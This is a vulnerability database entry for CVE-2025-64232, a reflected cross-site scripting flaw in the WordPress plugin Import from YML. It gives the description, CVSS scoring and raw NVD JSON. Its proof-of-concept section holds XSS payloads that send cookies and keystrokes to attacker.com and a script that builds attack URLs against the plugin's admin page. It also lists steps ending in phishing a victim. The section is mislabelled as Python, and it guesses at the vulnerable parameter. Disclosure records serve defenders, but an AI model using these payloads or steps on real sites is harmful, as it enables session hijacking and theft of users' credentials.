Security Vulnerability Report
中文
CVE-2025-64232 CVSS 7.1 HIGH

CVE-2025-64232

Published: 2025-11-06 16:16:14
Last Modified: 2026-04-15 00:35:42

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in icopydoc Import from YML import-from-yml allows Reflected XSS.This issue affects Import from YML: from n/a through <= 3.1.17.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Import from YML <= 3.1.17

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-64232 PoC - Reflected XSS in Import from YML plugin --> <!-- Target: WordPress site with Import from YML plugin <= 3.1.17 --> <!-- This PoC demonstrates how an attacker can inject malicious JavaScript --> <!DOCTYPE html> <html> <head> <title>CVE-2025-64232 PoC</title> </head> <body> <h2>CVE-2025-64232 - Reflected XSS PoC</h2> <p>Target: WordPress with Import from YML plugin <= 3.1.17</p> <h3>Attack URL:</h3> <pre id="attack-url"></pre> <h3>Malicious Payloads:</h3> <ul> <li>Cookie Theft: <script>fetch('https://attacker.com/steal?c='+document.cookie)</script></li> <li>Session Hijacking: <script>document.location='https://attacker.com/phish?session='+document.cookie</script></li> <li>Keylogger: <script>document.onkeypress=function(e){new Image().src='https://attacker.com/log?k='+e.key}</script></li> </ul> <h3>Usage:</h3> <ol> <li>Replace 'vulnerable-site.com' with actual WordPress URL</li> <li>Identify the vulnerable parameter (likely in admin or import pages)</li> <li>Encode and inject the XSS payload</li> <li>Send the crafted URL to victim via phishing</li> </ol> <script> // Generate attack URLs const targetBase = 'http://vulnerable-site.com/wp-admin/admin.php?page=import-from-yml'; const payloads = [ '<script>alert(document.domain)</script>', '" onerror="fetch(`https://attacker.com/steal?c=${document.cookie}`)"', "'><script>new Image().src='https://attacker.com/log?d='+document.domain</script>" ]; let urls = payloads.map(p => targetBase + '&param=' + encodeURIComponent(p)); document.getElementById('attack-url').textContent = urls.join('\n'); </script> </body> </html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-64232", "sourceIdentifier": "[email protected]", "published": "2025-11-06T16:16:14.333", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in icopydoc Import from YML import-from-yml allows Reflected XSS.This issue affects Import from YML: from n/a through <= 3.1.17."}, {"lang": "es", "value": "La vulnerabilidad de Neutralización Incorrecta de la Entrada Durante la Generación de Páginas Web ('Cross-Site Scripting') en icopydoc Import from YML import-from-yml permite XSS Reflejado. Este problema afecta a Import from YML: desde n/a hasta menor igual que 3.1.17."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/import-from-yml/vulnerability/wordpress-import-from-yml-plugin-3-1-17-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}